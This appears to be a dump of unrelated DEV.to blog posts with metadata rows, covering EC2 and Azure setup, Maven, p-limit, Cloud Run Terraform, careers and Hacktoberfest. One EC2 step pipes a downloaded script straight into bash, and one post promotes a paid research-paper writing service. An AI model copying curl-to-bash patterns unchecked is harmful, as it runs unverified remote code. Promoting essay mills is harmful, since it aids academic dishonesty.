✅ Dotenv is a zero-dependency module that loads environment variables from a .env file into process.env.

##### ⏭️ Confirm the installed packages in the package.json file
✅ `package.json` is the heart💖 of npm. It holds metadata relevant to the project and it is used to give information to npm that allows it to identify the project as well as handle the project's dependencies.
```json
{
"name": "ec2",
"version": "1.0.0",
"description": "",
"main": "index.js",
"scripts": {
"test": "echo \"Error: no test specified\" && exit 1"
},
"keywords": [],
"author": "",
"license": "ISC",
"dependencies": {
"dotenv": "^16.3.1",
"express": "^4.18.2"
}
}
```
##### ⏭️ Write your start script
In essence, you can run `npm start` to start your server.

##### ⏭️ Create a .env file
This is where we will store our environment variables. The environment variables are accessible through `process.env` object. We will use the `dotenv` package to load the environment variables from the `.env` file into `process.env` object.
```bash
touch .env
```
##### ⏭️ Add the following to the .env file
```bash
PORT=2323
```
##### ⏭️ Create a .gitignore file
This is where we will add the files we don't want to push to github. Preventing the `.env` file from being pushed to github is very important because it contains sensitive information like your database credentials, api keys, etc.
```bash
touch .gitignore
```
##### ⏭️ Add the following to the .gitignore file
```bash
node_modules
.env
```
##### ⏭️ Create app.js
```javascript
require('dotenv').config(); // load environment variables from .env file
const express = require('express');
const app = express();
const port = process.env.PORT || 3000; // default port is 3000
app.get('/', (req, res) => {
return res.status(200).json({
message: 'Hello World'
});
});
app.listen(port, () => {
console.log(`Server running on port ${port}`);
});
```
##### ⏭️ Start the server
Open your terminal and run the following command
```bash
npm start
```

##### ⏭️ Curl the server
Open another terminal and run the following command
```bash
curl localhost:2323
```
You should see the following

##### ⏭️ Create a git repository
Now that we have our app running, let's create a git repository and push our code to github. Run the following commands in your terminal
```bash
git init
git add .
git commit -m "Initial commit"
```

##### ⏭️ Create a new repository on github

##### ⏭️ I choose private because I don't want this code to be public

##### ⏭️ Copy the code in the highlighted area and add to your terminal

##### ⏭️ You should see the following

---
##### ⏭️ Now lets setup our ec2 instance
Login to your aws account and go to ec2

##### ⏭️ Choose EC2 from the list of services

##### ⏭️ Choose Launch Instance

##### ⏭️ Choose Ubuntu Server 20.04 LTS (HVM), SSD Volume Type
Name your instance and click next

##### ⏭️ Create a new key pair
A key pair consists of a public key that AWS stores and a private key file that you store. Together, they allow you to connect to your instance securely.
⚠️ Ensure you note the location of the key pair

##### ⏭️ Network setting
Tick the the three boxes and click next
- Allow ssh traffic: This allows you to connect to the instance using ssh
- Allow http traffic from internet: This allows you to access the instance from the browser over http (unsecure)
- Allow https traffic from internet: This allows you to access the instance from the browser over https (secure)

##### ⏭️ Review and launch

##### ⏭️ Success
We have successfully created our ec2 instance. Click on the instance highlighted in green to view the details

##### ⏭️ Click on the instance Id to view the details

##### ⏭️ Connecting to the ec2 instance using ssh
There are two ways to connect to the ec2 instance using ssh. You can either use the **browser** or use the **terminal**.
_Method 1:_ Using the browser
Click on connect and follow the instructions

##### ⏭️ Click the connect button

##### ⏭️ Change to root user
- Sudo: Super User Do; allows a user with proper permissions to execute a command as another user, such as the superuser.
- su: Switch User; allows you to switch to another user account without logging out of your current terminal session.
- the `-` flag is used to preserve the environment variables

##### ⏭️ Install nvm
nvm is a version manager for nodejs. It allows you to install multiple versions of nodejs and switch between them easily.
```
curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.34.0/install.sh | bash
```
##### ⏭️ Activate nvm
We need to activate nvm so that we can use it in the current terminal session
```
. ~/.nvm/nvm.sh
```
##### Install node
Install the latest version of node using nvm
```
nvm install node
```

##### ⏭️ Install git
Git is need to clone the repo we created earlier
```
sudo apt-get update -y
sudo apt-get install git -y
```
⚠️ You can omit the sudo since you are already root. So just run
```
apt-get update -y
apt-get install git -y
```
##### ⏭️ Check if node is installed
We have the latest version of node installed
```
node -v
```

##### ⏭️ Check if git is installed
```
git --version
```

##### ⏭️ Clone the repo we created earlier using ssh
```
git clone git@github.com:drsimplegraffiti/ec2-deploy.git
```
You should get this error because you have not added your ssh key to github

##### ⏭️ Connect github ssh key to ec2 instance
Generate a fingerprint for the ssh key
```bash
ssh-keygen -t ed25519 -C "your email"
```

Click enter thrice and leave the passphrase empty as default. You can add a passphrase if you want to add an extra layer of security.
##### ⏭️ eval the ssh-agent
eval is used to evaluate the ssh-agent in the current terminal session. The ssh-agent is a program that runs in the background and stores your ssh keys. The ssh-agent is used to authenticate you to the remote server without having to type your password every time.
```bash
eval "$(ssh-agent -s)"
```

##### ⏭️ Add the ssh key to the ssh-agent

##### ⏭️ Copy the ssh key to the clipboard
```bash
cat ~/.ssh/id_ed25519.pub
```

##### ⏭️ Paste the ssh key to github
Go to github settings -> SSH and GPG keys -> New SSH key
Paste the key and save. Auhenticate with your github password or Github mobile app


##### ⏭️ Test the connection
Scan the ssh
```bash
ssh-keyscan github.com >> ~/.ssh/known_hosts
```
Let's test the connection to github in the ec2 instance terminal
```bash
ssh -T git@github.com
```

##### ⏭️ Clone the repo again
This time, we should be able to clone the repo without any error
```bash
git clone git@github.com:drsimplegraffiti/ec2-deploy.git
```

##### ⏭️ List the files in the directory
```bash
ls -la
```
You should see the ec2-deploy folder

cd into the ec2-deploy
- cd - change directory
##### ⏭️ See the files in the ec2-deploy folder
```bash
ls -la
```

##### ⏭️ Install dependencies
```bash
cd ec2-deploy
npm install
```

##### ⏭️ Start the server
```bash
npm start
```
We got port 3000 because we ignored the .env file in the .gitignore file

💡 You can also use pm2 to start the server if you want to keep the server running even after you close the terminal
Install pm2 globally
```bash
npm install pm2 -g
```

##### ⏭️ Start the server with pm2
```bash
pm2 start app.js
```

##### ⏭️ Pick the ip address of the ec2 instance and curl it

YAAY! We have our server running on ec2 mapped to this ip address 🎉🎉🎉. However it is not secure because it is running on http. We will add SSL and Nginx in the next article.

##### ⏭️ Method 2: Connecting to the ec2 instance using ssh from your local machine
Click connect from your instance -> connect -> ssh client -> copy the ssh command

##### ⏭️ Open your terminal and cd into the directory where you saved the key pair
```bash
cd Downloads
```
##### Run the ssh command
```bash
ssh -i "devtokey.pem" ubuntu@ec2-35-175-174-169.compute-1.amazonaws.com
```
##### ⏭️ You will get this warning
This warning is related to permissions. We need to change the permissions of the key pair. We will do that in the next step

##### ⏭️ Chmod the key pair
Chmod is a command in Linux and other Unix-like operating systems that allows to change the permissions (or access mode) of a file or directory.
```bash
chmod 400 devtokey.pem
```
⚙️ 400 - read only by owner
⚙️ 600 - read and write by owner
##### ⏭️ Run the ssh command again
```bash
ssh -i "devtokey.pem" ubuntu@ec2-35-175-174-169.compute-1.amazonaws.com
```
##### ⏭️ You should see the following

##### ⏭️ Start the server
```bash
cd ec2-deploy
pm2 start app.js
```

You should get script already running because we already started the server on the ec2 instance earlier in the browser. Stop the ec2 on the browser by running
```bash
pm2 stop app.js
```
or
```bash
pm2 stop 0 # 0 is the id of the script referencing app.js
```

##### ⏭️ Start the server again
```bash
pm2 start app.js
```

##### ⏭️ Check the ec2 ip by running
```bash
curl ifconfig.me
```
##### ⏭️ Pick the ip address of the ec2 instance and curl it

##### ⏭️ Open another terminal and curl the ip address
```bash
curl 35.175.174.169
```
🎉🎉🎉 We have connected to our ec2 instance using ssh from our local machine.

##### Conclusion
We have successfully deployed our nodejs express app to ec2. We will add SSL and Nginx in the next article. Thanks for reading. Please leave a comment if you have any questions or suggestions.
 | drsimplegraffiti |
1,634,284 | Sloan's Inbox: Considering a career change from coding to graphic design, any advice? | Hey friends! Sloan, DEV Moderator and resident mascot, back with another question submitted by a DEV... | 22,731 | 2023-10-26T16:00:00 | https://dev.to/devteam/sloans-inbox-considering-a-career-change-from-coding-to-graphic-design-any-advice-565n | discuss, career, design | Hey friends! Sloan, DEV Moderator and resident mascot, back with another question submitted by a DEV community member. 🦥
For those unfamiliar with the series, this is another installment of Sloan's Inbox. You all send in your questions, I ask them on your behalf anonymously, and the community leaves comments to offer advice. Whether it's career development, office politics, industry trends, or improving technical skills, we cover all sorts of topics here. If you want to send in a question or talking point to be shared anonymously via Sloan, that'd be great; just scroll down to the bottom of the post for details on how.
Let's see what we have for this week...
### Today's question is:
> I've been coding for a good while now and am feeling ready for a change. I'm interested in graphic design and am curious if anybody else has made a similar move before? Any advice on how to approach this change, market myself, and anything else that comes to mind would be very much appreciated. 😀
>
Share your thoughts and let's help a fellow DEV member out! Remember to keep kind and stay classy. 💚
---
*Want to submit a question for discussion or ask for advice? [Visit Sloan's Inbox](https://docs.google.com/forms/d/e/1FAIpQLSc6wgzJ1hh2OR4WsWlJN9WHUJ8jV4dFkRDF2TUP32urHSAsQg/viewform)! You can choose to remain anonymous.* | sloan |
1,634,330 | GIT Merge Conflict | How to Resolve Git Merge Conflicts Hello, Upon completion of my journey as a beginner software... | 0 | 2023-10-13T23:28:26 | https://dev.to/zdededg97/git-merge-conflict-3ig3 | github, merge, beginners |
**How to Resolve Git Merge Conflicts**
Hello, Upon completion of my journey as a beginner software developer and, like many before me,I encountered the seemingly daunting world of Git merge conflicts. At first, it felt overwhelming, but guess what? It wasn't as scary as it sounded! Let me share my experience with you.
**What's a Merge Conflict?**
I used to think that merging in Git would always be smooth sailing. But no! A merge conflict is what happens when you and someone else (or even you in the past) make different changes to the same part of a file, and Git throws its hands up, saying, "I can't decide for you!"
**Steps to Navigating Merge Conflicts**
**Understanding the Problem**: The first time Git said there was a conflict, I was puzzled. But reading the error, it gave me clues.
**Finding the Culprit**: Opening the troubled file, I saw strange markings like:

**Making Decisions**: This was a "choose your adventure" moment.
I could either keep my changes.
Adopt the changes from the other branch.
Or even mix and match, taking some from both.
**Saving the Day**: After deciding which parts to keep, I removed those markers and saved the file. Then, feeling like a superhero, I did:
git add
git commit
**Onwards**!: And with that, I could continue my Git journey, merging, rebasing, and collaborating like a pro!
**Tips for Fellow Beginners**
- Keep Calm: It's just a hurdle, not a wall. You can get past it!
- Ask for Help: Don't hesitate to ask a friend or coworker. We all learn from each other!
- Practice Makes Perfect: The more you deal with conflicts, the better you become at resolving them.
**In Conclusion**
Starting as a software developer can be both thrilling and filled with challenges. Merge conflicts were one such challenge for me, but with patience and a bit of practice, I turned them into just another step in my coding journey. If I can do it, so can you! 💪 | zdededg97 |
1,634,557 | Determining the Ideal Length of a Research Paper: Guidelines and Considerations | The length of a research paper is a critical aspect of academic writing, and it often leaves students... | 0 | 2023-10-14T09:30:39 | https://dev.to/mikkejames/determining-the-ideal-length-of-a-research-paper-guidelines-and-considerations-o47 |
The length of a research paper is a critical aspect of academic writing, and it often leaves students and researchers pondering questions such as, "[How long should a research paper be](https://studyfy.com/blog/how-long-should-a-research-paper-be)?" and "What is the optimal length for each section?"
> The answer to these questions is not set in stone and can vary depending on multiple factors. In this article, we will explore the key elements to consider when determining the length of your [research paper writing service](https://studyfy.com/service/research-paper-writing-service) and provide insights into crafting effective introductions and conclusions.
1. The Standard Length of a Research Paper
Typically, research papers run around 4,000–6,000 words, but it's common to see short papers around 2,000 words or long papers exceeding 10,000 words. The variation in length is influenced by the specific requirements of the research project, the field of study, and the publication venue. If you're writing a paper for school, the recommended length should be provided in the assignment instructions.
2. Factors Influencing Length
a. Purpose and Scope of the Research
The primary factor determining the length of a research paper is the purpose and scope of the study. A comprehensive investigation into a complex topic will naturally require a longer paper, while a narrow and focused research question may lead to a shorter document. Consider the depth and breadth of your topic when deciding on the length.
b. Publication Guidelines
If you intend to submit your research paper to a journal or conference, it's crucial to adhere to their specific guidelines regarding paper length. Journals in different fields may have varying expectations, so always check their submission requirements.
c. Audience
Think about your target audience when determining the length of your research paper. Are you writing for experts in your field who may require an in-depth analysis, or is your audience more general, necessitating a concise and easily digestible presentation?
d. Depth of Analysis
A critical factor affecting length is the depth of analysis required to address your research question. Some topics demand extensive literature reviews, complex methodologies, and detailed discussions, while others may be more straightforward and concise.
3. Crafting an Effective Introduction
The introduction of a research paper serves as the roadmap for your readers, setting the stage for what's to come. But how long should an introduction be? While there is no fixed word count, a general guideline is that introductions typically make up 10-15% of the total paper length.
When writing your introduction:
- Provide context: Explain the significance of the topic and its relevance to your field of study or the broader world.
- State your research question or thesis: Clearly articulate what you aim to achieve in your paper.
- Outline your methodology: Briefly describe the research methods and approach you used.
- Preview the structure: Give readers a glimpse of the sections or key points they can expect in the paper.
4. Crafting an Effective Conclusion
The conclusion is your opportunity to summarize your findings, restate your thesis, and leave a lasting impression on your readers. Like the introduction, the length of the conclusion should be proportionate to the overall paper, usually comprising 10-15% of the total length.
In your conclusion:
- Summarize key findings: Provide a concise summary of your research results and their implications.
- Restate your thesis: Reaffirm the main argument or research question and highlight its significance.
- Offer recommendations: Suggest future research directions or practical applications of your findings.
- End on a strong note: Craft a memorable closing statement that leaves a lasting impact on your readers.
5. Conclusion
In summary, the ideal length of a research paper varies depending on several factors, including the purpose and scope of the study, publication guidelines, audience, and depth of analysis. When crafting your research paper, always consider these factors and aim for a balanced and coherent presentation of your research. Whether your paper is shorter or longer than the typical range of 4,000–6,000 words, what matters most is the clarity, relevance, and depth of your content. | mikkejames | |
1,634,705 | 1. Hello World! | Nice to meet you! Happy to have finally signed up to DEV. My name is Manoj Kumar, a beginner... | 0 | 2023-10-14T13:35:45 | https://dev.to/emanoj/1-hello-world-3bin | Nice to meet you!
Happy to have finally signed up to DEV.
My name is Manoj Kumar, a beginner student in coding. A very late starter in this field but I hope I can study and use it well. Not hiding the fact that I am nervous: _will I understand the subject matter? Will I be good at it? Will I enjoy it?_
I am working on a few personal and bootstrapped ventures like [austartups](https://austartups.au/?target=_blank), [come up with a name](https://comeupwithaname.com), [nifty zippy web](https://niftyzippyweb.com), and a few more coming up soon. All of these ideas and watching other people build their ideas inspired me to study coding. [Twitter](https://twitter.com/emanoj_) has been a great place to watch founders build-in-public and come across so many creative apps.
My course is a 10-month bootcamp program, starting October 2023. Patience and practice is the key, and I look forward to being inspired and helped by all of you. Hence, I am here.
I am planning to chronicle my studies at [Hashnode](https://emanoj.hashnode.dev) and wondering how to use DEV as well. I could duplicate the content but Google won't be happy. Perhaps, I should write about something very technical. Let's see.
Anyway, for now, I just wanted to say, "**Hi**" and get the ball rolling here. Can't wait to meet so many of you here! | emanoj | |
1,634,858 | ADD A DISK, INITIALIZE IT AND MAKE IT USEABLE IN AZURE | Step 1: After you have launched your virtual machine, come back to your Azure portal and click on... | 0 | 2023-10-14T16:08:34 | https://dev.to/jeffderick/how-to-add-a-disk-initialize-it-and-make-it-useable-55ac | devops, azure, beginners, cloudcomputing | **Step 1:** After you have launched your virtual machine, come back to your Azure portal and click on **DISK**

**Step 2:** Scroll down and click on **create and attach a new disk**

**Step 3:** A new pop up shows just below it. fill in the details. Your disk name, the storage type you want, and the size of the disk you want to create.

**Step 4:** Connect back to your virtual machine

**Step 5:** After your virtual machine is done loading, go to the search bar and search for **Disk management** and click on **Create and format hard disk partition**

**Step 6:** a new tab opens up. scroll down, you will see **Disk 2**, right click on it and click **Simple new volume**.

**Step 7:** Follow the installation process by clicking **Next**

**Step 8:** When you get to the **Format partition** tab, you select how you want your disk to be formatted

**Step 9:** You click on **Finish** and you are done

To check if the disk is installed and ready to use, go to **This PC** on your system, you will see it mounted.

- Note: You can give you disk a name when you are mounting it. Mine is showing **new volume** because I skipped that process. | jeffderick |
1,635,120 | Maven on Java 21 and Devuan 5 (Debian 12): Install manually | Summary Apache Maven is a popular open source software to build and manage projects of... | 25,038 | 2023-10-15T04:00:17 | https://scqr.net/en/blog/2023/10/15/maven-on-java-21-and-devuan-5-debian-12-install-manually/index.html | maven, java, openjdk, devuan | ## Summary
[Apache](https://apache.org/) [Maven](https://maven.apache.org/) is a popular open source software to build and manage projects of [Java](https://dev.java/) (and also other programming languages), licensed under [Apache-2.0](https://www.apache.org/licenses/LICENSE-2.0).
With [Devuan](https://www.devuan.org/) [5 Daedalus](https://www.devuan.org/os/announce/daedalus-release-announce-2023-08-14) based on [Debian](https://www.debian.org/) [12 bookworm](https://www.debian.org/releases/bookworm/), it is easy to use it thanks to [their packages management](https://packages.debian.org/bookworm/). However, it is not always the latest. Actually, Maven Debian 12 offers is currently [3.8](https://maven.apache.org/docs/3.8.1/release-notes.html) instead of [3.9](https://maven.apache.org/docs/3.9.0/release-notes.html). Well, is it a big problem ? Probably, no.
In [my previous post](https://scqr.net/en/blog/2023/10/14/java-21-on-devuan-5-debian-12-install-manually/index.html), I installed [OpenJDK](https://openjdk.org/) [21](https://jdk.java.net/21/), the latest, manually on Devuan 5. Here, I will show how to install Maven manually, too.
Of course, it is easier to run `apt install maven` 🫣
### Environment
- OS: Devuan 5 Daedalus
- based on Debian 12
- App Engine: OpenJDK 21
- Project Build and Management: Apache Maven [3.9.5](https://maven.apache.org/docs/3.9.5/release-notes.html)
## Tutorial
Suppose that your `PATH` includes Java 21 `bin` which appears before those of other Java versions such as 17 (the previous LTS).
### Get Apache Maven package
Visit: https://maven.apache.org/download.cgi
Get the binary with the command line, for example:
```console
$ curl -LO https://dlcdn.apache.org/maven/maven-3/3.9.5/binaries/apache-maven-3.9.5-bin.tar.gz
```
You can verify the download by comparing the checksums between the server and the local. Use the command lines below, for example:
```console
$ echo "$(curl -s https://downloads.apache.org/maven/maven-3/3.9.5/binaries/apache-maven-3.9.5-bin.tar.gz.sha512) apache-maven-3.9.5-bin.tar.gz" | \
sha512sum -c
apache-maven-3.9.5-bin.tar.gz: OK
```
It means it was confirmed that the server checksum was equal to the local one:
```console
$ # checksum of the downloaded file
$ sha512sum apache-maven-3.9.5-bin.tar.gz
4810523ba025104106567d8a15a8aa19db35068c8c8be19e30b219a1d7e83bcab96124bf86dc424b1cd3c5edba25d69ec0b31751c136f88975d15406cab3842b apache-maven-3.9.5-bin.tar.gz
```
### Place files
Extract it:
```console
$ tar xzf apache-maven-3.9.5-bin.tar.gz
```
The result is as below:
```console
$ ls {.,apache-maven-3.9.5}
.:
apache-maven-3.9.5/ apache-maven-3.9.5-bin.tar.gz
(...)
apache-maven-3.9.5:
bin/ boot/ conf/ lib/ LICENSE NOTICE README.txt
```
Now you have `apache-maven-3.9.5` directory which contains `bin` etc. 👍
### Set environment variables
Update `PATH` to include Maven `bin`:
```console
$ # case bash
$ export PATH=$(readlink -f ./apache-maven-3.9.5/bin):$PATH
$ # case fish
$ #set -x PATH $(readlink -f ./apache-maven-3.9.5/bin/):$PATH
```
## Conclusion
Now Apache Maven is in your hands:
```console
$ mvn --version
Maven home: /(...)/apache-maven-3.9.5
Java version: 21, vendor: Oracle Corporation, runtime: /(...)/jdk-21
Default locale: en_US, platform encoding: UTF-8
OS name: "linux", version: "6.1.0-13-amd64", arch: "amd64", family: "unix"
```
Let's create an example project named "maven-example-01" and run it:
```console
$ # create a project
$ mvn archetype:generate \
-DarchetypeArtifactId=maven-archetype-quickstart \
-DinteractiveMode=false \
-DgroupId=com.myexample.app \
-DartifactId=maven-example-01
$ # files are generated
$ cat src/main/java/com/myexample/app/App.java
package com.myexample.app;
/**
* Hello world!
*
*/
public class App
{
public static void main( String[] args )
{
System.out.println( "Hello World!" );
}
}
$ # build it
$ mvn package
$ # run
$ java -cp \
target/maven-example-01-1.0-SNAPSHOT.jar \
com.myexample.app.App
Hello World!
```
Yay 🙌
| nabbisen |
1,635,224 | My Hacktoberfest 2023 Experience | Intro I’m excited to share with you my experience of participating in this year's... | 24,880 | 2023-10-15T08:57:40 | https://dev.to/_eduard26/my-hacktoberfest-2023-experience-47b0 | hack23contributor, hacktoberfest23, opensource, github | ### Intro
I’m excited to share with you my experience of participating in this year's Hacktoberfest. In this post, I will talk about the highs and lows, the growth, and the benefits of contributing to open source projects during this month.
### Highs and Lows
One of the biggest highs for me was discovering and contributing to two amazing repositories: [illa-builder](https://github.com/illacloud/illa-builder) and [trello-clone](https://github.com/0l1v3rr/trello-clone).
ILLA is a robust open source low-code platform for developers to build internal tools. By using ILLA's library of Components and Actions, developers can save massive amounts of time on building tools. You can use natural language to define your agent’s logic, personality, and behavior, and then deploy it as a web app, a chatbot, or a voice assistant. I was fascinated by this idea and decided to try it out for myself. I created a personalized recipe generator based on user’s culinary preferences using illa ai builder.([Github PR](https://github.com/illacloud/illa-builder/pull/2531)) I also created an app on this platform, a random rgba color generator.([Github PR](https://github.com/illacloud/illa-builder/pull/2838)) It was a fun and rewarding experience to see my AI agent come to life and suggest delicious dishes for me.
trello-clone is a web app that replicates the functionality of Trello, a popular project management tool. It uses Next.js 13, React, Tailwind CSS and Prisma. I learned a lot about these technologies while working on this project. I helped fix some bugs such as adding adding focus on inputs and fixing the WYSIWYG editor text overflow.([Github PR1](https://github.com/0l1v3rr/trello-clone/pull/28), [Github PR2](https://github.com/0l1v3rr/trello-clone/pull/39))
Of course, not everything was smooth sailing. I also faced some challenges and difficulties during Hacktoberfest 2023. Some of them were:
- Finding suitable projects to contribute to. There are so many open source projects out there, but not all of them are beginner-friendly or well-documented. I had to do some research and filtering to find the ones that matched my interests and skills.
- Understanding the codebase and the workflow of the projects. Each project has its own structure, style, and conventions. It took me some time to get familiar with them and follow the guidelines. I also had to learn how to use Git and GitHub effectively to fork, clone, branch, commit, push, pull, and merge.
- Dealing with errors and bugs. Sometimes, things didn’t work as expected or broke down completely. I had to debug and test my code thoroughly before submitting a pull request. I also had to deal with merge conflicts and code reviews.
However, I didn’t give up or get discouraged by these problems. Instead, I used them as opportunities to learn and grow. I adapted by:
- Asking for help from the maintainers or other contributors when I was stuck or confused. They were very friendly and supportive and gave me useful feedback and guidance.
- Reading the documentation, tutorials, articles, blogs, videos, podcasts, etc. related to the projects or technologies I was working on. They helped me understand the concepts and best practices better.
- Practicing and experimenting with different solutions until I found the one that worked best for me.
### Growth
I can confidently say that my skillset improved significantly during Hacktoberfest 2023. After working on these projects, I learned:
- How to use illa-builder to create AI agents and apps without coding
- How to use Next.js 13 to create fast and scalable web apps
- How to use Prisma to store and manage data
- How to use Husky to format all the files from each commit automatically
I also learned some soft skills that are essential for any developer:
- How to communicate effectively with other developers
- How to better collaborate on open source projects
- How to write clear and concise code comments and documentation
- How to write good bug reports and pull requests
### Benefits
Participating in Hacktoberfest 2023 was not only a learning experience but also a rewarding one. Some of the benefits that I gained from it were:
- Contributing to open source projects that are useful and meaningful for me and others
- Connecting with other developers from different backgrounds and levels of expertise
- Earning some cool swag from Hacktoberfest organizers and sponsors
- Having fun and enjoying the process of creating and sharing | _eduard26 |
1,638,072 | hola | A post by tamij12 | 0 | 2023-10-18T02:39:03 | https://dev.to/tamij12/hola-4bkn | tamij12 | ||
1,639,039 | Serving Tasks Efficiently: Understanding P-Limit In Javascript | You are at a busy restaurant. There’s just so many tables available, and there’s a large queue of... | 0 | 2023-10-18T18:24:35 | https://dev.to/doziestar/serving-tasks-efficiently-understanding-p-limit-in-javascript-4m0m | javascript, concurrency, beginners, advanced | ---
title: Serving Tasks Efficiently: Understanding P-Limit In Javascript
published: true
date: 2023-10-18 17:30:35 UTC
tags: javascript,concurrency,beginner,advanced
canonical_url:
---

You are at a busy restaurant. There’s just so many tables available, and there’s a large queue of people wanting to be seated. The people at the restaurant serve as tasks for the JavaScript programm, which is represented by the programme.
Let’s imagine that this restaurant has a policy stating that a set number of people may be seated at once. Others must wait in queue until a seat becomes available. This is comparable to the operation of the JavaScript “p-limit” library. The number of promises (tasks) that can run concurrently is limited.
### Why would we need this?
When too many people are seated at once at a restaurant, the staff may feel overworked and the service may suffer. Similar to this, trying to run too many tasks at once in a programme might cause it to lag or even crash. This is particularly crucial for resource-intensive tasks like file system access and network request processing.
You can regulate the flow of tasks to guarantee that only a predetermined number can run concurrently by using p-limit. By doing this, you can guarantee that your programme will always be responsive and effective.
### How does it work?
Assume there is a unique gatekeeper at the eatery. Only a limited number of persons are let in at once by this gatekeeper, who is aware of how many tables are available. When one set of persons departs, the gatekeeper lets the next set in.
This gatekeeper in “p-limit” is a function you define that sets a limit on how many promises can execute concurrently.
### Let’s see some code!
First, you need to install the p-limit library:
```
yarn add p-limit
```
Next, let’s write some code:
```
const pLimit = require('p-limit');
// This creates a gatekeeper that only allows 2 promises to run at once
const limit = pLimit(2);
const cookDish = async (dishName) => {
// Simulating a time-consuming task
await new Promise(resolve => setTimeout(resolve, 1000));
console.log(`${dishName} is ready!`);
};
// Create an array of dishes to be cooked
const dishes = ['Pizza', 'Burger', 'Pasta', 'Salad', 'Ice Cream'];
// This is like the customers waiting in line
const tasks = dishes.map(dish => {
return limit(() => cookDish(dish));
});
// Execute all tasks
Promise.all(tasks).then(() => {
console.log('All dishes are served!');
});
```
even though we have five dishes, only two will be cooked at the same time due to our limit. So, you’ll see:
```
Pizza is ready!
Burger is ready!
Pasta is ready!
... and so on.
```
But remember, only two dishes are being cooked simultaneously!
### HubHub Youtube Fetcher
Now let’s look at an example from Hubbub, which helps to further understand it.
A feature at Hubbub retrieves data from a YouTube channel, including the various video shelves (categories of videos) and the videos contained in those shelves.
But you can’t just send a tonne of queries to YouTube’s servers in a short amount of time because they have rate constraints. They will temporarily block you if you do. This is the sweet spot for “p-limit”.
Here’s how we use it at Hubbub:
```
const pLimit require('p-limit');
const limit = pLimit(5);
async getYoutubeChannelItemList(channelId) {
try {
console.log('channelId', channelId);
const response = await youtube.getChannel(channelId);
const allShelfItems = [];
for (const shelf of response.shelves) {
const shelfItemsPromises = shelf.items.map(item => {
// This is the crucial part. For each item in the shelf, we limit how many can be processed simultaneously.
return limit(() => this.createItemFromVideo(item, response, channelId, 'youtubeChannels'));
});
// Wait for all the video items in this shelf to be processed
const shelfItems = await Promise.all(shelfItemsPromises);
allShelfItems.push(...shelfItems);
}
return allShelfItems;
} catch (error) {
Sentry.captureException(error); // Reporting the error to an error tracking platform
throw new HttpException(INTERNAL_SERVER_ERROR, error.message); // Handle the error gracefully
}
}
```
### Breaking it Down
1. Set Up the Limit: pLimit(5) means at any given time, a maximum of 5 promises (tasks) are running concurrently. Think of it as only allowing 5 YouTube video fetch requests at the same time.
2. Fetch the Channel: youtube.getChannel(channelId) fetches the YouTube channel's details, including its shelves.
3. Process Each Shelf: For each shelf in the channel, We want to process the video items. But instead of processing all items at once and risking a rate limit violation, it uses our limit:
4. return limit(() => this.createItemFromVideo(item, response, channelId, 'youtubeChannels'));
5. Here, the createItemFromVideo function is called, but only 5 of them will run at the same time.
6. Wait for Completion: await Promise.all(shelfItemsPromises) ensures that the code waits until all video items in the current shelf are processed before moving on to the next shelf.
We makes sure we collect YouTube channel details quickly and without going over YouTube’s rate constraints by using p-limit. It’s a great illustration of how to effectively handle several asynchronous processes. A well-designed programme handles its responsibilities optimally, just as a restaurant offers excellent service by managing its people! | doziestar |
1,671,155 | Hi! I'm new here.. | I’m Ryan VerWey, a mid-level developer with a burgeoning passion in the fields of web development and... | 0 | 2023-11-19T04:12:57 | https://dev.to/rverwey/hi-im-new-here-2069 | webdev, powerplatform, newdev, beginners | I’m Ryan VerWey, a mid-level developer with a burgeoning passion in the fields of web development and UI/UX design. With my roots firmly planted in SharePoint and Microsoft Power Platform, I've decided to venture into the dynamic world of web development and the creative realm of UI/UX design.
My journey into this new domain is not just a career shift, but a quest to deepen my understanding and skills in a rapidly evolving digital landscape. Through this blog, I aim to share my experiences, challenges, and the valuable lessons learned along the way.
I believe that growth comes from stepping out of our comfort zones. This transition marks a significant leap for me, from a specialized focus to a broader and more inclusive perspective in technology. My goal is to not only enhance my technical capabilities but also to develop a keen eye for design and user experience.
Stay tuned as I navigate through this exciting phase of my career, where every day is a learning opportunity. I look forward to connecting with fellow enthusiasts, exchanging ideas, and growing together in this journey.
 | rverwey |
1,639,713 | A minimal setup for a high availability service using Cloud Run | In this blog post, I will explain what is needed to set up a web service that runs in multiple GCP... | 0 | 2023-10-19T11:58:31 | https://xebia.com/blog/a-minimal-setup-for-a-high-availability-service-using-cloud-run/ | cloud, googlecloudplatform, terraform | ---
title: A minimal setup for a high availability service using Cloud Run
published: true
date: 2022-01-11 14:16:13 UTC
tags: Cloud,GoogleCloudPlatform,Terraform
canonical_url: https://xebia.com/blog/a-minimal-setup-for-a-high-availability-service-using-cloud-run/
---
In this blog post, I will explain what is needed to set up a web service that runs in multiple GCP regions.
The main reasons to deploy your service in more than one region are:
- Handle single-region failures so that your application is highly available.
- Route traffic to the nearest region so your users experience faster loading times.
## Create Cloud Run deployments
A Cloud Run service only lives in a single region, so for a multi-region setup we will need to deploy the same container in multiple regions.
Luckily using a Terraform `for_each` loop, this does not add too much additional configuration:
```
locals {
locations = ["europe-west4", "europe-west1"]
}
resource "google_cloud_run_service" "service" {
for_each = toset(local.locations)
name = "service-${each.key}"
location = each.key
...
}
```
I recommend to use the name of the region in the name of the Cloud Run service so you can easily find them and guarantee uniqueness.
> We use `local.locations` to define the regions we want to deploy in so we can re-use that configuration in other resources.
## Set up load balancing ingress
By default, Cloud Run gives a service a publicly available `.run.app` URL.
However this points to a single Cloud Run service, and for a multi-region set we will need multiple services.
To do this, we will need to create a Global Load Balancer that uses [Serverless Network Endpoint Groups](https://cloud.google.com/load-balancing/docs/negs/serverless-neg-concepts) (NEGs) as backend.
These NEGs then route the traffic to the Cloud Run instances.
Let’s set up the needed resource for our ingress stack:
```
resource "google_compute_global_address" "ip" {
name = "service-ip"
}
resource "google_compute_region_network_endpoint_group" "neg" {
for_each = toset(local.locations)
name = "neg-${each.key}"
network_endpoint_type = "SERVERLESS"
region = each.key
cloud_run {
service = google_cloud_run_service.service[each.key].name
}
}
resource "google_compute_backend_service" "backend" {
name = "backend"
protocol = "HTTP"
dynamic "backend" {
for_each = toset(local.locations)
content {
group = google_compute_region_network_endpoint_group.neg[backend.key].id
}
}
}
resource "google_compute_url_map" "url_map" {
name = "url-map"
default_service = google_compute_backend_service.backend.id
}
resource "google_compute_target_http_proxy" "http_proxy" {
name = "http-proxy"
url_map = google_compute_url_map.url_map.id
}
resource "google_compute_global_forwarding_rule" "frontend" {
name = "frontend"
target = google_compute_target_http_proxy.http_proxy.id
port_range = "80"
ip_address = google_compute_global_address.ip.address
}
```
